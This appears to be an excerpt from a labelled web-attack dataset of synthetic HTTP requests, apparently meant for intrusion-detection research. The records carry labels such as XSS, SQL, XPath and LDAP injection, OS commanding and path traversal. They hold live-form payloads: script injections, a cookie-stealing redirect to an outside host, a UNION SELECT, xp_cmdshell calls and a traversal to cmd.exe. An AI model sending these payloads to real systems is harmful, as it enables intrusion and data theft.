GET /dc3mi08rt/KUsgsHnAat.asmx?16ROPK5=548448407&VB6@MOVL=22097&5asatrft1n=htpasst+Ce%29%7Cntlt%7E%3EaTt&vFrMIbody=eAIMqMv&n0dttfoeepytns=98952040&sgl=6services&1wttvNnnri=rz5&atge=ue&ucj-zxyNfPz=7308414&ee3rbbanyun=030203&jdoLIN65I_c=31702 HTTP/1.0
Host: 78.75.138.214
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: compress, gzip, compress;q=0.3, gzip
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 174.219.236.229
Cookie: dseaiaj=<![CDATA[<!--]]    ><script >[alert  ('Staeya');]//--></script >;soeswaRpnraj=rKGAhCsOj1m;sglikeM=a3Mslz6t;ll=65;t_i8OlbVJnnform=651988740
Cookie2: $Version="486"
Date: Mon, 19 Jul 04 01:55:46 GMT
ETag: W/"pVc-@H1sF2MLot6H0_e"
Expect: 100-continue
From: os7ddt@2hedt3.cz
If-Modified-Since: Tue, 20 Apr 10 17:10:17 UTC
If-Unmodified-Since: Sun, 25 Apr 04 22:03:27 GMT
If-Match: *
If-None-Match: "Hqs6RhYLUaUlDyfkks"
If-Range: *
Max-Forwards: 20
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest nc=BdfD5Ba4
Authorization: Digest nc=BAB3CeEb
Range: -3820,-75
Referer: http://www.tonrslq.net/ertipt1y.mdb
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: n04G8d http://www.oovr.uk
UA-CPU: PowerPC
UA-OS: Linux
UA-Color: color32
UA-Pixels: 630x4242
Via: 7.8 249.60.46.84
Transfer-Encoding: ygf9; oent=akooeka6
Upgrade: sNn/2.2, tbnncm/6.1
Warning: 212 www.ee2Ee.js "iuaewa4tc" 
X-Forwarded-For: 180.229.29.245
X-Serial-Number: 19077842196498
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46667
Start - Id: 49578
class: XPathInjection
GET /hYq.VYRov3w/s5bkn7ttksirie6i/bxxZFDaE2H5/t1OISX1C/oc@wTBSz/n4E6qhVKok/yqHCEl/haaezbiesdeQndsu/M420KDd2bj@x.tiff?tzntsmmaNOeao=2641802&sa=njhgLr%27+or+++1%3C++iEothn%2Fd%2Ftmsxui%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D0%5D+++or+++++%27ttyui8tt%27++%3D++%27&Caonj=1i6o&srhr9trfthI5ea=otxev&rErr1fayr3oaas=106125&x4xT=88521824&ZlodXTpasswd2dnYm=eeuq%27s&on9=hGNOES&qoatWl9anydHo=31320049 HTTP/1.0
Host: www.tz6wmvZ.ch
Connection: keep-alive
Accept: video/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 184.205.215.140
Cookie: 1afraiprntal=01695824;toTw0si=fat
Cookie2: $Version="6"
Date: Fri, 06 Nov 09 04:28:44 GMT
ETag: "xh1l6UnAdi-ZT-Z47-j"
Expect: rrqenrnd
From: xAlQbr@oetAt.gov
If-Modified-Since: Sat, 04 Oct 08 11:16:37 GMT
If-Unmodified-Since: Fri, 12 Nov 04 08:23:05 CET
If-Match: "v6bqbeJyYuoJYc3Iy9W"
If-None-Match: "MY46Vh.n75PPlpuB2F"
If-Range: Thu, 16 Jun 05 06:37:51 UTC
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: eeftuo sfagt=srres
Authorization: 0ejre partissh=brdssh
Range: -351866,-996363,00-
Referer: http://www.dmihv.org/2s1nndmt/Ptahii/0eiijeE.php
TE: chunked;q=0.7,gzip;q=0.4,trailers
Trailer: If-Unmodified-Since
User-Agent: 8ta3mttnteo
UA-CPU: StrongARM
UA-Disp: 979,7479,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2073x766
Via: 9.0 59.254.79.224:3497, 6.2 www.atewfme.shtml:443
Transfer-Encoding: gzip
Upgrade: w3tun/4.7, nll2c/3.7, iotwG/2.5, ialro/2.8, zf5q/7.2
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 4750592519886658439
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49578
Start - Id: 44682
class: PathTransversal
PUT /b_-JOuAe7BV@@OnbOi/ll.css? HTTP/1.0
Content-Length: 228
Content-Language: 6proH8,tssCem
Content-Encoding: gzip
Content-Location: http://hd4jq.biz/nsiYo.mp3
Content-MD5: a29veWNveVJ1c1JzbmVhbg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Dec 04 18:55:02 CET
Last-Modified: Sat, 03 Sep 05 22:50:28 CET
Host: 156.252.117.95
Connection: close
Accept: application/x-tar, image/png
Accept-Charset: cp-936, utf-8, x-mac-arabic;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 209.36.114.208
Cookie: bmglfmUhnlI=erDD3;hitcsAwRhye=Dtn4j fg;wzisati73p4gsr=38231755
Cookie2: $Version="2"
Date: Wed, 12 May 04 16:04:07 UTC
From: EeA0y@doscaiun.org
If-Modified-Since: Wed, 02 Jan 08 01:23:29 CET
If-Unmodified-Since: Fri, 11 Jan 08 10:03:00 GMT
If-None-Match: *
If-Range: *
Max-Forwards: 50
Pragma: fi54='di'
Authorization: Digest cnonce="2rtnhor"
Range: 2168-,8-1607,73-
Referer: http://edu5.cz/1ast/ettip4cf/ecltdt/itdwoTs/veyEci.js
TE: trailers,gzip,deflate
User-Agent: Mhse/7.7
UA-OS: Windows 95
UA-Color: color8
Via: 4.0 68.114.94.19, 1.4 109.230.9.253, 0.7 182.168.61.197
Transfer-Encoding: gzip
Upgrade: 2dgtes/0.6
Warning: 690 www.maefe.png:3036 "oEisin22ih1tenabt" 
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 175251
----: ------------------------

nzowpatsria=43967&9Kwp-f6JW2K=%2e%2e.\%252f/\%252f/...\%252e..%2e&otaOickygoesE=pcectsock_streamos0deaoAevtmsex&mochawvG@a-O1JP=oSX&ltor=nua\dlmsehmGnm9&cpocrritlrt=yftrkept&voB=yr)[ cdhttpTnull&nf=Mo

End - Id: 44682
Start - Id: 35629
class: XPathInjection
GET /etax1atiumh1nnt/E_li9JRFFncr/nFiCRBrBRE3c8Ou/hwADEK5JofSEB/s_/Nf2Xjiera/tLWWBpr_Nwqui.q/tyseAeT/6LNXAMZ4cUp2L/rRl4JL6La0smKbInb/0DEIJ/sZcc1fMYRdM.swf?nw-WinsertKET=oeh%27+++or+++++%28i++%3C+++count%28Doec%2Fchild%3A%3Atext%28%29%29+and+++++j++++%3C++count%28rDie%2Fchild%3A%3Acomment%28%29%29++and++++k+%3C+++count%28Sis%2Fchild%3A%3A*%29++++%29+++or+++%27XEZhgNa%27++%3D++%27++++siueSdtf%27++++or HTTP/1.1
Host: 242.133.34.146
Connection: close
Accept: */*;q=0.6
Accept-Charset: windows-1254;q=0.2, windows-874, windows-1257
Accept-Encoding: *
Accept-Language: nnc3Atr-stbp2as;q=0.8, cd6ibp-ifknw, hti0aPbb-on;q=0.0
Cache-Control: max-stale=69
Client-ip: 108.171.74.43
Cookie: B9eiFyutj=oe/d+j2eey1trI 
Cookie2: $Version="6"
Date: Tue, 24 May 05 01:44:03 UTC
ETag: W/"MtaA7VKLaZIKhkEV"
Expect: 100-continue
From: yehNodot@eblEqjJp.ch
If-Modified-Since: Sun, 02 Jul 06 22:53:33 CET
If-Unmodified-Since: Wed, 22 Feb 06 08:51:20 CET
If-Match: *
If-None-Match: *
If-Range: "z285ETIARPyp0Sb0Hn.t"
Max-Forwards: 3
MIME-Version: 3.8
Pragma: dtsnAAl='nEdTn'
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: 0Sri sdeo=1cleT9
Range: 73614-,71-,427615-
Referer: http://2kicct.ch/i5voetih/ac96eit/iees/o1eae6v.cfm
TE: trailers
Trailer: Range
User-Agent: sket36l/8.7
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 817x128
Via: 7.6 www.oxfmgklo.tiff
Transfer-Encoding: gzip
Upgrade: eclhdI/8.8, x4oas2/8.6, oieb/7.4
Warning: 986 www.rBnsrcl.html "5cdarlosaE" 
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 65275952070459353
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35629
Start - Id: 44495
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.1
Host: www.dtein.st:15
Connection: close
Accept: video/*, text/*
Accept-Charset: windows-1257, windows-1257, x-mac-roman, iso-8859-8-i
Accept-Encoding: gzip, deflate, compress;q=0.8
Accept-Language: oCbNsevU-ytehiuw;q=0.1, t-h4reakgn, c6iiasne-r;q=0.3, ao-u
Cache-Control: only-if-cached
Client-ip: 224.120.218.101
Cookie: rs6U3o0fittstds=887
Cookie2: $Version="20"
Date: Thu, 21 Feb 08 16:19:58 CET
ETag: "brWHOt3l4ea9t1DC"
Expect: 100-continue
From: fo6stv@wTex.net
If-Modified-Since: Wed, 03 Nov 04 01:35:19 GMT
If-Unmodified-Since: Mon, 14 Feb 05 01:21:06 GMT
If-Match: "WESv2dH1wwZ5eQ5Vx@e"
If-None-Match: "7.q_o8Zr@t3oEVZ.si"
If-Range: "v-lub7Me1IPbwi8kUN"
Max-Forwards: 9
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: NTLM c2hhdTB0b3RpY29rdHBUMmVlVHI1bWhnaW93ZGxvZWVmcnM=
Range: -80,3-,-9028
Referer: http://wyiyanav.gov/nnot/aluocnt.mp3
TE: trailers
Trailer: Via
User-Agent: Mozilla/4.3 (Windows; U; Windows NT 8.4; 0r-by; rv:9.9.9) Gecko/67762570
UA-CPU: Sparc
UA-Disp: 3780,9274,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 949x9593
Via: 5.1 110.42.33.9, 2.8 158.35.234.113:79358
Transfer-Encoding: gzip
Upgrade: eoke/8.6, mnenb/6.1, 5nls/8.7
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44495
Start - Id: 41507
class: SqlInjection
PUT /geuneotenemaloiq/rleanIYtlea3upjlyteT/9S/eutflolsehhcTgsrd/t3mstoonAL4tlhs6f/rD32ei75bdl/eoy3a/oZgcMaII/yayasd/hMMwDYX.htm? HTTP/1.0
Content-Length: 194
Content-Language: oatsglsh,hn7qs,e
Content-Encoding: deflate
Content-Location: /ntTwqm.gz
Content-MD5: OEhpdG1lZGluYkFlbWRpaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Mar 05 21:06:08 UTC
Last-Modified: Thu, 09 Jul 09 05:52:17 GMT
Host: www.srenr.cz:439
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-cyrillic, windows-874
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 3.29.1.103
Cookie: h0tc=eemmeamf5md;esomlhIg3yleee=np_;dh=neHcPJto
Cookie2: $Version="3"
Date: Wed, 23 Apr 08 11:22:31 CET
ETag: "IsQ4lwcajgC53l_Svbbk"
Expect: maEbbf
From: pfpr@iosyoa.gov
If-Modified-Since: Wed, 27 Feb 08 18:13:01 GMT
If-Unmodified-Since: Sun, 07 Mar 04 04:55:01 UTC
If-Match: "jS_@PhBQ.eTxcRurXC"
If-None-Match: *
If-Range: *
Max-Forwards: 431
MIME-Version: 9.8
Pragma: tRtc9iaa='enssm'
Proxy-Authorization: NTLM ZWx3bnJjY25jVGVvbzkzZHRuMWFhbGFydzVhcmVuaHl6YnF2Yw==
Authorization: Basic YWVlVGhob206cmllZXNpMg==
Range: 229-94,-0,-455
Referer: http://netoe.gov/amivea/sgr2d.txt
TE: gzip;q=0.6,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.1 (Windows; U; Windows NT 7.3; xo-wW; rv:0.1.1) Gecko/42653670
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: 0.8 www.uuteUZl.shtml, e3epcc/9.0 9.187.170.229
Transfer-Encoding: identity
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hak0me=erCoeaneeayi&a0=aai dyv  eewinntN$s1ts2 &an=or2Uts&amn=g&r8eEErh8mh='    )  UNION     ALL    SELECT    8845     FROM     4li    WHERE     (''=    '&tndEi= &gZsr=cdsi6)s6

End - Id: 41507
Start - Id: 48863
class: XPathInjection
GET /egtmgsdlNo8isot/nFVJSi5j8kO885Y6/hwSaeAwkse0liAdiNlow/ay.Zvf/gw/igpqM59pKxNC.cfm?n97kVeqhtpassX=p%7Ea%25rf+h&aslvnhczieeeCcr=5055822&rZ0Q5UWaNo7=eoraccess_logsaae8om&sxpie=gattf8e&nt5idTta9er=30536+++++or+++1%3C+++++t%2Fdeer%2Ftscu9%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D069%5D++++or++2427%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&FQtptmpsamhposition=ion3mnsgiaepioz&teChmtecxnr41a=%3FON HTTP/1.1
Host: www.or4cs.ch:9
Connection: hrsia0
Accept: audio/basic
Accept-Charset: iso-8859-5, x-mac-greek, us-ascii;q=0.5
Accept-Encoding: 
Accept-Language: TTiunH-ter, YEEo-ao;q=0.0, Crin-0e5urI, s7kaihsa-lnikD;q=0.1, lOctoDev-Spwra;q=0.5
Cache-Control: no-transform
Client-ip: 91.233.200.85
Cookie: Felnsshb=gWUS1IMXXS;pgnwEa=veqch;wfss=97888;zrxLe=fezVi64
Cookie2: $Version="570"
Date: Fri, 01 Dec 06 10:00:07 CET
ETag: "_fRV_D@7oKn-qsK"
Expect: nrieT=25Gtie8;ndjsg9=nmre9sw
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Tue, 20 Mar 07 09:45:59 UTC
If-Unmodified-Since: Thu, 11 Nov 04 21:22:43 CET
If-Match: *
If-None-Match: *
If-Range: "WjiHDCMUFRtaez5"
Max-Forwards: 1
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic aHdmYTY6RXk3aw==
Authorization: Basic ZnNlc2RrbGQ6dEdoaGhhRGY=
Range: 692-,-672,-664068
Referer: /iu9l/hqveRiue/iztnox/iaits.pdf
TE: chunked;q=0.7,chunked,gzip;q=0.0
Trailer: Accept-Charset
User-Agent: Mozilla/8.2 (Windows; U; WinNT 0.1; nL-rg; rv:6.1.8) Gecko/86111311
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: sbTa/3.8 115.123.24.125
Transfer-Encoding: REal; iHyshvu=aoilttln
Upgrade: cntr/0.2, fRir/4.0, qalsS/7.9
Warning: 031 102.38.172.102 "nisa2e2yv" 
X-Forwarded-For: 156.103.50.172
X-Serial-Number: 043440
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48863
Start - Id: 47646
class: XSS
GET /rhSPXjI@S/ihylBWo8U/vA1gDRt2@Vc6Ymr/atixafNomPnKen1Yenun/9dgAAFJ2ANRQPF-.php3?AdPcat.=amaie1jSmie&i65ereAascun=e2HbXt&thf9Ey=2919&CBKnsamr=ob%40mj%24nuobx%24fs0&esvc=8&ZDDBdcG=nisnncattk539aE2&pnLtx=uD%25+ftnnolkee0h&NsEostdinq-xL6Tt=%3C%21--+--+--%3E%3Cscript++%3E%5Balert%28%27sstxhnam1e%27%29%3B%5D%3C%2Fscript++%3E%3C%21--+--+--%3E HTTP/1.1
Host: www.tt0rlrgeen.de
Connection: close
Accept: image/*;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.1, identity;q=0.3
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 168.210.69.11
Cookie: dqDusvoxtd9=dh9S.vha;ushutdownArBvsamstyle=rxdJnhayr
Cookie2: $Version="823"
Date: Fri, 06 Feb 04 11:35:47 UTC
ETag: W/"KeyKdGthDghEQTc"
Expect: h7bew
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Thu, 01 Apr 10 02:33:43 UTC
If-Unmodified-Since: Thu, 04 Oct 07 10:51:13 CET
If-Match: *
If-None-Match: "g0Nxp49zdnVaV17qXr1"
If-Range: "lFZ0gggcJ8dQ6@gQ"
Max-Forwards: 2
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM Z25lb29zZTBldGdoZW90aGM0aXB0Y25ubjF1bml4aDhsZ3Q=
Authorization: Digest response="3e6AFcBd3DB6A9c456a7BdCF530D3E27"
Range: 51-,059585-
Referer: /ssio/Tm3nm/ae7psu.sh
TE: trailers,deflate;q=0.3,trailers
Trailer: Via
User-Agent: Mozilla/5.2 (Machintosh; U; PPC Mac OS X 2.7; 9i-6s; rv:7.7.5) Gecko/21830774
UA-CPU: x86
UA-Disp: 434,760,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 635x1311
Via: soni/1.0 www.lqtsEi.js, 8.0 249.102.209.83
Transfer-Encoding: gzip
Upgrade: aeel/6.8, 8r7lst/5.1, dcuh/5.3, we7c9e/0.8
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47646
Start - Id: 38395
class: LdapInjection
GET /l1Q0jOk06Mk3HTS@/tLXI4MBL7jytt_.fFg4q/bntNeTSg78w1nre.jsp?CY11vHG01bgroup by=sro&@IH6N3WRMvQO=539&tsoZrc0e7=rhvA&wTwadqptljezr=crahquo0oaEozabicq&ietlsfkusroaq=hssystemvlt%25s+perlr6vbscriptem&e7telindpe=lwh%29%28++++%7C+%28ais%3D*%29 HTTP/1.0
Host: 52.116.76.19
Connection: ciaestna
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eth-je;q=0.3, sn-sghsnit;q=0.6
Cache-Control: k=IeeRup
Client-ip: 214.154.43.120
Cookie: i4mem1k2d3tsbo3=9735;aNrotnjUr7bVge=g0ieoehxeyu0t5sC;xlerll=all;gyoelal4yf0sos=s0Qv.Y;fzdt9pive0in=6128528;elthkiwgea9onjU=oybgthbEoitlodrop
Cookie2: $Version="08"
Date: Thu, 09 Jul 09 07:31:25 GMT
ETag: "fYwZspfNp8.oWly-Njh"
Expect: snbrd=ntapgBi;ofnucbh
From: e3ig@cUsnasr.com
If-Modified-Since: Thu, 20 Aug 09 06:58:00 CET
If-Unmodified-Since: Sun, 07 Dec 08 12:51:03 CET
If-Match: "A9Q4lrq.pGRZarwDKO"
If-None-Match: *
If-Range: "@kLqjiKycSjv_jy"
Max-Forwards: 0
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="teJjbis"
Authorization: iyvg o3wnll=ex535
Range: -96373
Referer: /lssosoec/12haag/lHIcp.msf
TE: deflate
Trailer: Trailer
User-Agent: Mozilla/8.2 (Windows; U; WinNT 1.9; bl-tr; rv:8.5.6) Gecko/02133729
UA-CPU: Sparc
UA-Disp: 6597,6108,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6780x4829
Via: 4.8 88.241.245.135:24, 8.1 108.187.220.135:5
Transfer-Encoding: compress
Upgrade: rlwdd/8.0, wre/1.9, b3o/6.7
Warning: 267 www.otmR1ir.htm "emnzR" "Mon, 09 Jun 08 08:56:30 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 25128044
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38395
Start - Id: 36401
class: OsCommanding
GET /hP@ZtOw4ezj8m1iNWvKU/Az7saappcgda/tm/S2HexecIWMtshutdownV@/dtar95uarrmftti.png?tifin=%27%3BEXEC+++master.dbo.xp_cmdshell++%27cmd.exe HTTP/1.0
Host: www.eEeoaaA7in.biz
Connection: keep-alive
Accept: image/*
Accept-Charset: windows-1251
Accept-Encoding: 
Accept-Language: T-ue;q=0.7, 3in7-n, moi-do, eitrQi-ep;q=0.1, 1aceibf-rbw;q=0.9
Cache-Control: yomna='1o2oio'
Date: Tue, 13 Jun 06 23:17:42 UTC
If-Match: *
Referer: http://t4SotO0f.org/n37edDci/NreI/Awrn/ttcaee/siiGr.htm
User-Agent: Mozilla/9.1 (Windows; U; WinNT 7.8; tO-Ee; rv:5.3.9) Gecko/49658224
Via: LYb4ae/0.7 73.2.170.101, HTTP/4.2 49.95.165.25

null

End - Id: 36401
Start - Id: 43942
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.lI9e6.ch
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-icelandic, x-mac-turkish, windows-1251, utf-7
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 203.44.173.36
Cookie: oeidse=sCpsU0ad;isie5d2w=soi;impDoliuhrll=887
Cookie2: $Version="4"
Date: Tue, 25 Oct 05 20:42:59 GMT
ETag: "CAA1BX3UtwQhtOdd"
Expect: Ktdna
From: 1mrsvi@GkweMt.fr
If-Modified-Since: Tue, 07 Aug 07 12:10:07 CET
If-Unmodified-Since: Wed, 20 May 09 06:05:33 GMT
If-Match: "Ed_MEUpQFIM27pN2sk"
If-None-Match: *
If-Range: Mon, 20 Feb 06 23:34:26 UTC
Max-Forwards: 2
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: 4bhso opohyO=ucsru
Range: 080946-24031
Referer: http://joab.biz/u3jmeE.nsf
TE: deflate;q=0.4
Trailer: If-None-Match
User-Agent: Mozilla/3.1 (compatible; MSIE 3.4; Mac OS X; e7dE0uo2; se2rwe; o4twhvtnd)
UA-CPU: 68000
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
Via: 3.5 www.mfdfo.jpg
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43942
Start - Id: 45437
class: PathTransversal
POST /sp.cd/nNUl/3twodsgo/nweiMii8xt/stwadprllomt.html? HTTP/1.0
Content-Length: 212
Content-Language: uxr,szti7Ass
Content-Encoding: gzip
Content-Location: http://www.sxtsd.uk/a8b3di3h.msf
Content-MD5: bndPd040bjNJdnN0dDFFZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Aug 06 22:39:23 UTC
Host: www.hthlca.cz
Connection: close
Accept: application/postscript;q=0.4, video/*, video/*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, deflate
Accept-Language: *
Cache-Control: max-age=4
Cookie: jdkeIyEtSislcS=t8|;ds=hoxhonullt nupdatehttpe10gar ;hAxqeh9en=9k-psev+ t;JzgKdVdbC=zh_C22W3-I.0;miehlubhaeE=04;HwPNoe=52
Cookie2: $Version="71"
Date: Wed, 11 May 05 05:22:25 GMT
ETag: "cWVaQKspJRouILSecHXU"
Expect: 100-continue
If-Modified-Since: Thu, 11 Oct 07 06:38:37 CET
If-Unmodified-Since: Thu, 31 Mar 05 17:38:58 GMT
If-None-Match: *
If-Range: *
Max-Forwards: 4382
Referer: /ieac/sbGrtt/OsaWqL.swf
TE: trailers,chunked;q=0.4,chunked
Trailer: Pragma
User-Agent: Mozilla/5.8 (compatible; Konqueror/9.5; Win 9x; hssetfgs; elTBniT; 6nee)
Via: 6.2 www.ceool.css, 3.8 51.165.173.215
Transfer-Encoding: deflate
X-Forwarded-For: 173.42.173.213
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aWeyrh3nsdEe8=r2e&RoaE_=4c]bor5&ounsadted1tnjaA=\WINNT\system.ini&T91AnEuv=1C1atp5&jykm=iuotOEgpnreplace|nj6xuWt6htpass&9zhUx5eeag=hpr<61olyn&olkeweqcj7=Idv6Hh5vlt&icteoEeyy=hr r$ 7andehr(=vhtiAoo

End - Id: 45437
Start - Id: 38150
class: LdapInjection
GET /6B6sXMeQKNDUoo/wzfANNSo5IdP.dll?nggeuT=%29++++%28+++%7C+%28++cn%3D*o++%27brien*+%29%28mail++%3D*o%27brien*+++%29+++&r5nRmhi8hdtu=437700690 HTTP/1.0
Host: www.otolbic.st
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: compress, deflate, compress;q=0.2
Accept-Language: l-eo3fnto, yshnrwt-rjnte4;q=0.8
Cache-Control: hdinrneh=zer
Client-ip: 106.203.232.28
Cookie: E6dke_A_U=06716;betweenscript5andV7F60=430511;1N=etwtHsenel1irTc;nreo1hs=etIecgo9atCeia
Cookie2: $Version="16"
Date: Thu, 28 Jun 07 20:46:32 GMT
ETag: "Ptct44HXIkgtS5In"
Expect: 100-continue
From: 7enqeIo@sjtoi.net
If-Modified-Since: Wed, 03 Mar 10 07:45:58 GMT
If-Unmodified-Since: Fri, 27 Feb 09 07:06:25 GMT
If-Match: *
If-None-Match: "4A8WCO9y3lpgsEBcL3J"
If-Range: "y4SrPA97Vx05HYP3"
Max-Forwards: 990
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic YWVhbjplamVlY2hjbg==
Authorization: njtdo oiaHAsOe=InaIstei
Range: 652463-080254,-92,5914-088
Referer: http://www.olssanA.biz/racbt/tdexear/Rmtio/nsaa/fodetol.asp
TE: trailers
Trailer: Proxy-Authorization
User-Agent: tAMoq6z http://www.drsTtc.biz
UA-CPU: StrongARM
UA-Disp: 651,9493,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9560x3335
Via: eys/5.7 www.Ee2qe.js, FTP/2.1 www.nw2e.css, 9.3 www.eonr1lzr.tiff
Transfer-Encoding: gzip
Upgrade: tfcsu/8.0, late/9.1, 9vp6/5.4, h2zo/6.8, hai3pl/9.2
Warning: 700 216.4.11.243 "oisttasyiausek4esAB8" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38150
Start - Id: 47704
class: XSS
GET /L7.-BzWWcagGiP/eeon1/am/aaesecriphak7era7/hL.rSkrXHVhWjebQ/emboe/mlar2eno/0srlbta/myN/rH6l5-5dzPzDLR3QM.jsp?nppauhireqeWd3p=teci+l2m&loimogn3E=15189&Ah4_5mL=%3Cbody++++onload%3D+%22++%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.la.com%2Fcgi-bin%2Fseri.cgi%27%2Bdocument.cookie%29%3B%5D+++%22++%3E&sj=e2%40_pU2VE4&qagwvrltu=%27etNgrA+oca5rnwindow.open&tHBinsertnph-AZV@=arQidzl5nAF4&c6=603 HTTP/1.0
Host: www.erehe0od.it
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp, windows-874, iso-8859-15
Accept-Encoding: compress;q=0.8, identity;q=0.7
Accept-Language: 8no-tasnEt;q=0.6
Cache-Control: min-fresh=71
Client-ip: 29.159.169.244
Cookie: atnrrc=e;2tU@3=ssl4evalx~Yn;eiarteademlod=awSE3_AVssZ;orkspssasqca=q4KKrylZ@p;roorat9C7dcDnSi=9545077
Cookie2: $Version="6"
Date: Thu, 23 Jun 05 21:06:54 GMT
ETag: W/"XsttvGY924rMZZs4W"
Expect: ps4sdN
From: ntca1@4fmcsegl.gov
If-Modified-Since: Fri, 18 Jul 08 16:50:30 CET
If-Unmodified-Since: Wed, 17 Aug 05 03:55:41 CET
If-Match: *
If-None-Match: "J12uDcKVYOcKVej_a"
If-Range: *
Max-Forwards: 5
MIME-Version: 9.8
Pragma: Imban=eushhyi
Proxy-Authorization: NTLM b3Q2OWN3aXJkc2xycmhyaGVldGRpYXg0c2llZHR1bmhqdEdvZnNoZWhy
Authorization: Basic cmx0MjpyOWU3cw==
Range: 37-9480,573294-46248,0850-768
Referer: /Dnuh/fznlsReo/dsxn/voeg.php
TE: trailers
Trailer: From
User-Agent: Mozilla/4.1 (Machintosh; U; Mac OS X 4.7; mM-ld; rv:3.7.9) Gecko/38317301
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5167x472
